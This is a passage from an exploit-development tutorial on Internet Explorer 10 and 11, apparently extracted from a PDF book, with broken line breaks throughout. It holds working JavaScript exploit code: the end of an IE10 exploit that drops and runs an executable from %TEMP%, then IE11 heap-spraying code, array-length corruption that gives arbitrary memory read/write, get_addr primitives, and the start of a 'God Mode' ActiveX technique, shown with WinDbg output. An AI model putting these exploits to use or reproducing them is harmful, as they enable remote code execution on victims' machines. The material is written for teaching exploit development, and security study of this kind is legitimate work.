);
 
    
}
 
 
fname
 
=
 
shell
.
ExpandEnv
ironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
if
 
(
createExe
(
fname
,
 
decode
(
runcalc
))
 
==
 
0
)
 
{
 
//      alert("SaveToFile failed");
 
      
window
.
location
.
reload
();
 
      
return
 
0
;
 
    
}
 
    
shell
.
Exec
(
fname
);
 
 
//    alert("All done!");
 
  
})();
 
 
</
script
>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 460 
-
 
</
hea
d
>
 
<
body
>
 
</
body
>
 
</
html
>
 
 
As always, I snipped 
runcalc
. You can download the full code from here: 
code4
.
 
Load the page in IE using 
SimpleServer
 and everything should wor
k just fine! This exploit is very reliable. In 
fact, even when IE crashes because something went wrong with the UAF bug, IE will reload the page. The 
user will see the crash but that’s not too serious. Anyway, the event of a crash is reasonably rare.
 
Inter
net Explorer 10 32
-
bit and 64
-
bit
 
There are two versions of IE 10 installed: the 
32
-
bit
 and the 
64
-
bit
 version. Our exploit works with both of 
them because while the 
iexplore.exe
 module associated with the main window is different (one is a 32
-
bit 
and the 
other a 64
-
bit executable), the 
iexplore.exe
 module associated with the tabs is the same 32
-
bit 
executable in both cases. You can verify this just by looking at the path of the two executable in the 
Windows Task Manager
.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 461 
-
 
IE11: Part 1
 
 
For this exploit I’m using a 
VirtualBox VM
 with 
Windows 7 64
-
bit SP1
 and the version of 
Internet Explorer 11
 
downloaded from h
ere:
 
http://filehippo.com/download_internet_explorer_windows_7_64/tech/
 
EmulateIE9
 
Finding a 
UAF
 bug for 
IE 11
 for this chapter was very hard because 
security researchers
 te
nd to omit 
important technical details in their articles. As a student of exploit development I wish I had access to such 
information.
 
Anyway, the UAF bug I found needs the following line:
 
XHTML
 
 
<meta
 http
-
equiv=
"X
-
UA
-
Compatible"
 content=
"IE=EmulateIE9"
 
/
>
 
 
Unfortunately, when we’re emulating 
IE 9
, 
Int32Arrays
 are not available, so the method we used for 
IE 10
 
(see 
article
), although pretty general, is not applicable h
ere. It’s time to look for another method!
 
Array
 
We saw how 
Arrays
 are laid out in memory in IE 10. Things are very similar in IE 11, but there’s an 
interesting difference. Let’s create an 
Array
 with the following simple code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 
language=
"javascript"
>
 
  
var
 
a
 
=
 
new
 
Array
((
0x10000
 
-
 
0x20
)/
4
);
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
a.length
;
 
++
i
)
 
    
a
[
i
]
 
=
 
0x123
;
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
We saw that in IE 10 
Arrays
 were created by calling 
jscript9!Js::JavascriptArray::NewInstance
. 
Let’s put a 
breakpoint on it:
 
bp jscript9!Js::JavascriptArray::NewInstance
 
If we reload the page in IE 11 nothing happens. Let’s try with the constructor:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 462 
-
 
0:002> bc *
 
0:002> x jscript9!*javascriptarray::javascriptarray*
 
6f5c2480          jscript9!Js::Javas
criptArray::JavascriptArray (<no parameter info>)
 
6f5c7f42          jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>)
 
6f4549ad          jscript9!Js::JavascriptArray::JavascriptArray (<no parameter info>)
 
6f47e091          jscript9!Js::Jav
ascriptArray::JavascriptArray (<no parameter info>)
 
0:002> bm jscript9!*javascriptarray::javascriptarray*
 
  1: 6f5c2480          @!"jscript9!Js::JavascriptArray::JavascriptArray"
 
  2: 6f5c7f42          @!"jscript9!Js::JavascriptArray::JavascriptArray"
 
  
3:
 6f4549ad          @!"jscript9!Js::JavascriptArray::JavascriptArray"
 
  
4: 6f47e091          @!"jscript9!Js::JavascriptArray::JavascriptArray"
 
Here I got a weird error in 
WinDbg
:
 
Breakpoint 1's offset expression evaluation failed.
 
Check for invalid symbols 
or bad syntax.
 
WaitForEvent failed
 
eax=00000000 ebx=00838e4c ecx=00000000 edx=00000000 esi=00839b10 edi=00000000
 
eip=7703fc92 esp=05d57350 ebp=05d573d0 iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             
efl=00000246
 
ntdll!ZwUnmapViewOfSection+0x12:
 
7703fc92 83c404          add     esp,4
 
Let me know if you know why this happens. To avoid this error, you can set the 4 breakpoints by hand:
 
bp 6f5c2480
 
bp 6f5c7f42
 
bp 6f4549ad
 
bp 6f47e091
 
When we resume the ex
ecution and allow blocked content in IE, the second breakpoint is triggered and the 
stack trace
 is the following:
 
0:007> k 8
 
ChildEBP RetAddr  
 
0437bae0 6da6c0c8 jscript9!Js::JavascriptArray::JavascriptArray
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 463 
-
 
0437baf4 6d9d6120 jscript9!Js::JavascriptNativeA
rray::JavascriptNativeArray+0x13
 
0437bb24 6da6bfc6 jscript9!Js::JavascriptArray::New<int,Js::JavascriptNativeIntArray>+0x112
 
0437bb34 6da6bf9c jscript9!Js::JavascriptLibrary::CreateNativeIntArray+0x1a
 
0437bbf0 6da6c13b jscript9!Js::JavascriptNativeIntArray
::NewInstance+0x81    <
--------------------
 
0437bff8 6d950aa3 jscript9!Js::InterpreterStackFrame::Process+0x48e0
 
0437c11c 04cd0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8
 
WARNING: Frame IP not in any known module. Following frames may
 be wrong.
 
0437c128 6d94ceab 0x4cd0fe9
 
Let’s delete all the breakpoints and put a breakpoint on 
JavascriptNativeIntArray::NewInstance
:
 
0:007> bc *
 
0:007> bp jscript9!Js::JavascriptNativeIntArray::NewInstance
 
Reload the page and when the breakpoint is trigg
ered, press 
Shift+F11
 to return from the call. 
EAX
 should 
now point to the 
JavascriptNativeIntArray
 object:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 464 
-
 
 
It seems that the buffe
r for the 
Array
 has space for just 
4
 elements. Or maybe that 
4
 elements are the 
header for the buffer?
 
 When the 
Array
 grows, a bigger buffer should be allocated and thus the pointer to the 
buffer in the 
Array
 object should change. So, let’s put a hardware
 breakpoint on the 
buf_addr
 field:
 
ba w4 @eax+14
 
When we resume the execution, the hardware breakpoint is triggered and the stack trace looks like this:
 
0:007> k 8
 
ChildEBP RetAddr  
 
0437bac0 6daf49a2 jscript9!Js::JavascriptArray::AllocateHead<int>+0x32
 
04
37baf0 6daf4495 jscript9!Js::JavascriptArray::DirectSetItem_Full<int>+0x28d
 
0437bb44 6d94d9a3 jscript9!Js::JavascriptNativeIntArray::SetItem+0x187        <
------------------------
 
0437bb70 03a860a6 jscript9!Js::CacheOperators::CachePropertyRead<1>+0x54
 
WAR
NING: Frame IP not in any known module. Following frames may be wrong.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 465 
-
 
0437c0c8 6da618a7 0x3a860a6
 
0437c104 6d950d93 jscript9!InterpreterThunkEmitter::GetNextThunk+0x4f
 
0437c128 6d94ceab jscript9!Js::FunctionBody::EnsureDynamicInterpreterThunk+0x77
 
0437c16
8 6d94d364 jscript9!Js::JavascriptFunction::CallFunction<1>+0x88
 
As we expected, the 
Array
 grows when elements are added through 
jscript9!Js::JavascriptNativeIntArray::SetItem
. The new address of the buffer is 
039e0010h
. Now resume the 
execution, stop the 
execution again and have a look at the buffer at 
039e0010h
:
 
 
As we can see, the integers 
0x123
 are written without any kind of encod
ing in the buffer. In IE 10 we would 
have had 
0x247
, i.e. 
0x123*2 + 1
. The only caveat is that the integers are signed. Let’s see what happens 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 466 
-
 
when we write to the 
Array
 a value bigger than the biggest positive integer number. Let’s spray the heap to 
find 
one of the buffers more easily:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
((
0x10000
 
-
 
0x20
)/
4
);
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
0x123
;
 
    
a
[
i
][
0
]
 
=
 
0x80000000
;
 
  
}
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
In WinDbg, go to an address like 
9000000h
 or use 
VMMap
 to determine a suitable address. This time you’ll 
see something familiar:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 467 
-
 
 
This is the exact situation we had in IE 10: the numbers are encoded (
2*N + 1
) and first element, which 
should be the number 
0x80000000
, points to a 
JavascriptNumber
 object. Is there a way t
o write 
0x80000000
 
directly? Yes: we need to find the negative number whose 
2
-
complement
 representation is 
0x80000000
. 
This number is
 
-
(0x100000000 
-
 0x80000000) = 
-
0x80000000
 
Let’s try it:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
CollectGarba
ge
();
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
((
0x10000
 
-
 
0x20
)/
4
);
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
0x123
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 468 
-
 
    
a
[
i
][
0
]
 
=
 
-
0x80000000
;
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</
html>
 
 
As you can see,
 we get exactly what we wanted:
 
 
We can conclude that in IE 11 an 
Array
 stores 
32
-
bit signed integers
 direct
ly without any particular encoding. 
As soon as something different than a 32
-
bit signed integer is written into the 
Array
, all the integers are 
encoded as 
2*N + 1
 just as in IE 10. This means that as long as we’re careful, we can use a normal 
Array
 as 
an 
I
nt32Array
. This is important because, as we said in the section 
EmulateIE9
, 
Int32Arrays
 won’t be 
available.
 
Reading/Writing beyond the end
 
In IE 10 the length of an 
Array
 appears both in the 
Array
 object and in the header of the 
Array
 buffer. Let’s 
see if 
things have changed in IE 11. Let’s use the following code:
 
XHTML
 
 
<html>
 
<head>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 469 
-
 
<script
 language=
"javascript"
>
 
  
var
 
a
 
=
 
new
 
Array
((
0x10000
 
-
 
0x20
)/
4
);
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
7
;
 
++
i
)
 
    
a
[
i
]
 
=
 
0x123
;
  
 
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</h
tml>
 
 
To determine the address of the 
Array
, we can use the following breakpoint:
 
bp jscript9!Js::JavascriptNativeIntArray::NewInstance+0x85 ".printf 
\
"new Array: addr = 0x%p
\
\
n
\
",eax;g"
 
Here’s a picture of the 
Array
 object and its buffer:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 470 
-
 
 
Let’s use this code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
var
 
array_len
 
=
 
(
0x10000
 
-
 
0x20
)/
4
;
 
  
var
 
a
 
=
 
new
 
Array
(
array_len
);
 
  
f
or
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
7
;
 
++
i
)
 
    
a
[
i
]
 
=
 
0x123
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 471 
-
 
  
alert
(
"Modify the array length"
);
 
  
alert
(
a
[
array_len
]);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
We want to modify the 
Array
 length so that we can read and write beyond the real end of the 
Array
. Let’s 
load 
the 
HTML
 page in IE and when the first alert message appears, go in WinDbg and overwrite the length 
field in the 
Array
 object with 
0x20000000
. When we close the alert box, a second alert box appears with the 
message 
undefined
. This means that we couldn’t r
ead beyond the end of the 
Array
.
 
Now let’s try to modify the “
Array actual length
” field in the header of the 
Array
 buffer (from 
7
 to 
0x20000000
): same result.
 
Finally, modify the “
Buffer length
” field in the header of the 
Array
 buffer (from 
0x3ff8
 to 
0x20
000000
): same 
result. But if we modify all the three length fields it works! Is it really necessary to modify all the three values 
by hand? An 
Array
 grow when we write at an index which is beyond the current length of the 
Array
. If the 
buffer is too small,
 a big enough buffer is allocated. So what happens if we modify just the “
Buffer length
” 
field and then write at an index of the 
Array
 which is beyond the current length of the 
Array
? If our logic 
doesn’t fail us, IE should grow the 
Array
 without touching 
the buffer because IE thinks that the buffer is big 
enough (but we know we faked its size). In other words, IE should update the other two length fields as a 
consequence of writing to the 
Array
 beyond the current end of the 
Array
.
 
Let’s update our code:
 
XH
TML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
var
 
array_len
 
=
 
(
0x10000
 
-
 
0x20
)/
4
;
 
  
var
 
a
 
=
 
new
 
Array
(
array_len
);
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
7
;
 
++
i
)
 
    
a
[
i
]
 
=
 
0x123
;
 
  
alert
(
"Modify the 
\
"Buffer length
\
" field"
);
 
  
a
[
array_len
 
+
 
0x100
]
 
=
 
0
;
 
  
alert
(
a
[
arr
ay_len
]);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
We load the HTML page in IE and when the first alert box appears we modify the “
Buffer length
” field in the 
buffer header. Then we resume execution and close the alert box. IE might crash because we could
 
overwrite something important after the end of the 
Array
. In that case, repeat the whole process.
 
Now, when the second alert box appears, have another look at the 
Array
 object and at its buffer header:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 472 
-
 
 
Perfect! Again, understand that if we hadn’t altered the “
Buffer length
” field of the buffer, a new buffer of 
length at least 
0x40f9
 would have been allocated, and we wouldn’t have got
 read/write access to memory 
beyond the end of the 
Array
.
 
Whole address space read/write access
 
We want to acquire read/write access to the whole address space. To do so, we need to spray the heap with 
many 
Arrays
, modify the “
Buffer length
” field in the b
uffer header of one 
Array
, locate the modified 
Array
 and, 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 473 
-
 
finally, use it to modify all three length fields of another 
Array
. We’ll use this second 
Array
 to read and write 
wherever we want.
 
Here’s the javascript code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
(
function
 
()
 
{
 
    
CollectGarbage
();
 
    
var
 
header_size
 
=
 
0x20
;
 
    
var
 
array_len
 
=
 
(
0x10000
 
-
 
header_size
)/
4
;
 
    
var
 
a
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
array_len
);
 
      
a
[
i
][
0
]
 
=
 
0
;
 
    
}
 
    
magic_addr
 
=
 
0xc000000
;
 
    
//           /
-------
 allocation header 
-------
\
 /
---------
 buffer header 
---------
\
 
    
// 0c000000: 00000000 0000fff0 00000000 00000000 00000000 00000001 00003ff8 00000000
 
    
//                                      
                 array_len buf_len
 
    
alert
(
"Modify the 
\
"Buffer length
\
" field of the Array at 0x"
 
+
 
magic_addr.toString
(
16
));
 
    
// Locate the modified Array.
 
    
var
 
idx
 
=
 
-
1
;
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
 
-
 
1
;
 
++
i
)
 
{
 
      
// We try to mod
ify the first element of the next Array.
 
      
a
[
i
][
array_len
 
+
 
header_size
/
4
]
 
=
 
1
;
 
      
// If we successfully modified the first element of the next Array, then a[i]
 
      
// is the Array whose length we modified.
 
      
if
 
(
a
[
i
+
1
][
0
]
 
==
 
1
)
 
{
 
     
idx
 
=
 
i
;
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
idx
 
==
 
-
1
)
 
{
 
      
alert
(
"Can't find the modified Array"
);
 
      
return
;
 
    
}
 
    
// Modify the second Array for reading/writing everywhere.
 
    
a
[
idx
][
array_len
 
+
 
0x14
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
]
[
array_len
 
+
 
0x18
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
+
1
].
length
 
=
 
0x3fffffff
;
 
    
var
 
base_addr
 
=
 
magic_addr
 
+
 
0x10000
 
+
 
header_size
;
 
    
alert
(
"Done"
);
 
  
})();
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 474 
-
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
The header size for the buffer of an 
Array
 is 
0x20
 becaus
e there is a 
0x10
-
byte heap allocation header and 
a 
0x10
-
byte buffer header.
 
magic_addr
 is the address where the 
Array
 whose length we want to modify is located. Feel free to change 
that value.
 
To determine the index of the modified 
Array
 we consider each 
Array
 in order of allocation and try to modify 
the first element of the following 
Array
. We can use 
a[i]
 to modify the first element of 
a[i+1]
 if and only if 
a[i]
 is 
the modified array and the buffer of 
a[i+1]
 is located right after the buffer of 
a[i]
 in m
emory. If 
a[i]
 is not the 
modified 
Array
, its buffer will grow, i.e. a new buffer will be allocated. Note that if we determined that 
a[idx]
 is 
the modified 
Array
, then it’s guaranteed that the buffer of 
a[idx+1]
 hasn’t been reallocated and is still located
 
right after the buffer of 
a[idx]
.
 
Now we should be able to read/write in the address space 
[base_addr, 0xffffffff]
, but what about
 [0, 
base_addr]
? That is, can we read/write before the buffer of
 a[idx+1]
? Probably, IE assumes that the base 
addresses and t
he lengths of the 
Arrays
 are correct and so doesn’t check for overflows. Let’s say we want to 
read the dword at 
0x400000
. We know that 
base_addr
 is 
0xc010000
.
 
Let’s suppose that IE computes the address of the element to read as
 
base_addr + index*4 = 0xc010
000 + index*4
 
without making sure that
 index*4 < 2^32 
–
 base_addr
. Then, we can determine the index to read the dword 
at 
0x400000
 as follows:
 
0xc010000 + index*4 = 0x400000 (mod 2^32)
 
index = (0x400000 
-
 0xc010000)/4 (mod 2^32)
 
index = (0x400000 + 0 
-
 0xc0
10000)/4 (mod 2^32)
 
index = (0x400000 + 2^32 
-
 0xc010000)/4 (mod 2^32)
 
index = 0x3d0fc000 (mod 2^32)
 
The notation
 
a = b (mod N)
 
means
 
a = b + k*N for some integer k.
 
For instance,
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 475 
-
 
12 = 5 (mod 7)
 
because
 
12 = 5 + 1*7
 
Working with 32 bits in presence of over
flows is like working in 
mod 2^32
. For instance,
 
-
5 = 0 
-
 5 = 2^32 
-
 5 = 0xfffffffb
 
because, in 
mod 2^32
, 
0
 and 
2^32
 are equivalent (
0 = 2^32 
–
 1*2^32
).
 
To recap, if IE just checks that 
index < array_len
 (which is 
0x3fffffff
 in our case) and doesn’t do any
 
additional check on potential overflows, then we should be able to read and write in 
[0,0xffffffff]
. Here’s the 
implementation of the functions 
read
 and 
write
:
 
JavaScript
 
 
// Very Important:
 
    
//    The numbers in Array are signed int32. Numbers gre
ater than 0x7fffffff are
 
    
//    converted to 64
-
bit floating point.
 
    
//    This means that we can't, for instance, write
 
    
//        a[idx+1][index] = 0xc1a0c1a0;
 
    
//    The number 0xc1a0c1a0 is too big to fit in a signed int32.
 
    
//    We'll 
need to represent 0xc1a0c1a0 as a negative integer:
 
    
//        a[idx+1][index] = 
-
(0x100000000 
-
 0xc1a0c1a0);
 
    
function
 
int2uint
(
x
)
 
{
 
      
return
 
(
x
 
<
 
0
)
 
?
 
0x100000000
 
+
 
x
 
:
 
x
;
 
    
}
 
 
function
 
uint2int
(
x
)
 
{
 
      
return
 
(
x
 
>=
 
0x80000000
)
 
?
 
x
 
-
 
0x100000000
 
:
 
x
;
 
    
}
 
 
// The value returned will be in [0, 0xffffffff].
 
    
function
 
read
(
addr
)
 
{
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
var
 
val
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
val
 
=
 
a
[
idx
+
1
][
delta
/
4
];
 
      
else
 
        
// In 2
-
complement ar
ithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
val
 
=
 
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
];
 
      
return
 
int2uint
(
val
);
 
    
}
 
    
// val must be in [0, 0xffffffff].
 
    
function
 
write
(
addr
,
 
val
)
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 476 
-
 
      
val
 
=
 
uint2int
(
val
);
 
      
var
 
del
ta
 
=
 
addr
 
-
 
base_addr
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
a
[
idx
+
1
][
delta
/
4
]
 
=
 
val
;
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
]
 
=
 
val
;
 
    
}
 
 
We’ve already noted that 
Array
 contains
 signed 32
-
bit integers. Since I prefer to work with 
unsigned 32
-
bit 
integers
, I perform some conversions between 
signed
 and 
unsigned
 integers.
 
But we haven’t checked if all this works yet! Here’s the full code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javas
cript"
>
 
  
(
function
 
()
 
{
 
    
CollectGarbage
();
 
    
var
 
header_size
 
=
 
0x20
;
 
    
var
 
array_len
 
=
 
(
0x10000
 
-
 
header_size
)/
4
;
 
    
var
 
a
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
array_len
);
 
      
a
[
i
][
0
]
 
=
 
0
;
 
    
}
 
    
m
agic_addr
 
=
 
0xc000000
;
 
    
//           /
-------
 allocation header 
-------
\
 /
---------
 buffer header 
---------
\
 
    
// 0c000000: 00000000 0000fff0 00000000 00000000 00000000 00000001 00003ff8 00000000
 
    
//                                            
           array_len buf_len
 
    
alert
(
"Modify the 
\
"Buffer length
\
" field of the Array at 0x"
 
+
 
magic_addr.toString
(
16
));
 
    
// Locate the modified Array.
 
    
var
 
idx
 
=
 
-
1
;
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x1000
 
-
 
1
;
 
++
i
)
 
{
 
      
// We try to modify th
e first element of the next Array.
 
      
a
[
i
][
array_len
 
+
 
header_size
/
4
]
 
=
 
1
;
 
      
// If we successfully modified the first element of the next Array, then a[i]
 
      
// is the Array whose length we modified.
 
      
if
 
(
a
[
i
+
1
][
0
]
 
==
 
1
)
 
{
 
        
idx
 
=
 
i
;
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
idx
 
==
 
-
1
)
 
{
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 477 
-
 
      
alert
(
"Can't find the modified Array"
);
 
      
return
;
 
    
}
 
    
// Modify the second Array for reading/writing everywhere.
 
    
a
[
idx
][
array_len
 
+
 
0x14
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
][
array
_len
 
+
 
0x18
/
4
]
 
=
 
0x3fffffff
;
 
    
a
[
idx
+
1
].
length
 
=
 
0x3fffffff
;
 
    
var
 
base_addr
 
=
 
magic_addr
 
+
 
0x10000
 
+
 
header_size
;
 
    
// Very Important:
 
    
//    The numbers in Array are signed int32. Numbers greater than 0x7fffffff are
 
    
//    converted to 6
4
-
bit floating point.
 
    
//    This means that we can't, for instance, write
 
    
//        a[idx+1][index] = 0xc1a0c1a0;
 
    
//    The number 0xc1a0c1a0 is too big to fit in a signed int32.
 
    
//    We'll need to represent 0xc1a0c1a0 as a negative intege
r:
 
    
//        a[idx+1][index] = 
-
(0x100000000 
-
 0xc1a0c1a0);
 
    
function
 
int2uint
(
x
)
 
{
 
      
return
 
(
x
 
<
 
0
)
 
?
 
0x100000000
 
+
 
x
 
:
 
x
;
 
    
}
 
 
function
 
uint2int
(
x
)
 
{
 
      
return
 
(
x
 
>=
 
0x80000000
)
 
?
 
x
 
-
 
0x100000000
 
:
 
x
;
 
    
}
 
 
// The value re
turned will be in [0, 0xffffffff].
 
    
function
 
read
(
addr
)
 
{
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
var
 
val
;
 
      
if
 
(
delta
 
>=
 
0
)
 
        
val
 
=
 
a
[
idx
+
1
][
delta
/
4
];
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
      
val
 
=
 
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
];
 
      
return
 
int2uint
(
val
);
 
    
}
 
    
// val must be in [0, 0xffffffff].
 
    
function
 
write
(
addr
,
 
val
)
 
{
 
      
val
 
=
 
uint2int
(
val
);
 
      
var
 
delta
 
=
 
addr
 
-
 
base_addr
;
 
      
if
 
(
delta
 
>=
 
0
)
 
    
a
[
idx
+
1
][
delta
/
4
]
 
=
 
val
;
 
      
else
 
        
// In 2
-
complement arithmetic,
 
        
//   
-
x/4 = (2^32 
-
 x)/4
 
        
a
[
idx
+
1
][(
0x100000000
 
+
 
delta
)/
4
]
 
=
 
val
;
 
    
}
 
    
alert
(
"Write a number at the address "
 
+
 
(
base_addr
 
-
 
0x10000
).
toString
(
16
));
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 478 
-
 
  
var
 
num
 
=
 
read
(
base_addr
 
-
 
0x10000
);
 
    
alert
(
"Did you write the number "
 
+
 
num.toString
(
16
)
 
+
 
"?"
);
 
    
alert
(
"Done"
);
 
  
})();
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
To check if everything works fine, follow the instructions. Try also to write 
a number 
>= 0x80000000
 such as 
0x87654321
. Lucky for us, everything seems to be working just fine!
 
get_addr function
 
The 
get_addr
 function is very easy to write:
 
JavaScript
 
 
function
 
get_addr
(
obj
)
 
{
 
      
a
[
idx
+
2
][
0
]
 
=
 
obj
;
 
      
return
 
read
(
base_addr
 
+
 
0x10000
);
 
    
}
 
    
alert
(
get_addr
(
ActiveXObject
).
toString
(
16
));
 
 
Note that we can’t assign obj to 
a[idx+1][0]
 because this would make IE crash. In fact, 
a[idx+1]
 would 
become a mix 
Array
 and IE would try to encode the dwords of the entire space address!
 We can’t use 
a[idx]
 
for the same reason and we can’t use 
a[idx
-
1]
 or previous 
Arrays
 because their buffers were reallocated 
somewhere else (remember?). So, 
a[idx+2]
 seems like a good candidate.
 
God Mode
 
Now we need to port the 
God Mode
 from IE 10 to IE 11
. Let’s start with the first few lines:
 
JavaScript
 
 
// At 0c0af000 we can read the vfptr of an Int32Array:
 
    
//   jscript9!Js::TypedArray<int>::`vftable' @ jscript9+3b60
 
    
jscript9
 
=
 
read
(
0x0c0af000
)
 
-
 
0x3b60
;
 
    
.
 
    
.
 
    
.
 
    
// Bac
k to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable'
 
    
//      v
 
    
//   70792248 0c012b40 00000000 00000003
 
    
//   73b38b9a 00000000 0057
4230 00000000
 
    
//      ^
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 479 
-
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
 
    
var
 
addr
 
=
 
get_addr
(
document
.
createElement
(
"div"
));
 
    
alert
(
addr
.
toString
(
16
));
 
    
return
;
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x58b9a
;
 
 
When th
e alert box pops up, examine the memory at the indicated address and you should have all the 
information to fix the code. Here’s the fixed code:
 
JavaScript
 
 
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element
 div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable' = jscript9 + 0x2d50
 
    
//      v
 
    
//  04ab2d50 151f1ec0 00000000 00000000
 
    
//  6f5569ce 00000000 0085f5d8 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperation
s::CBaseFinalizer = mshtml + 0x1569ce
 
    
var
 
addr
 
=
 
get_addr
(
document
.
createElement
(
"div"
));
 
    
jscript9
 
=
 
read
(
addr
)
 
-
 
0x2d50
;
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x1569ce
;
 
 
Now let’s analyze 
jscript9!ScriptSite::CreateActiveXObject
, if still present. Firs
t of all, add this simple line of 
code:
 
JavaScript
 
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
 
Then, load the page in IE and add a breakpoint on 
jscript9!ScriptSite::CreateActiveXObject
. When the 
breakpoint is triggered, step through the code until you reach a ca
ll to 
CreateObjectFromProgID
:
 
04c05a81 e84a000000      call    jscript9!ScriptSite::CreateObjectFromProgID (04c05ad0)
 
Step into it (
F11
) and then step until you reach 
CanCreateObject
:
 
04c05b4c 8d45e8          lea     eax,[ebp
-
18h]
 
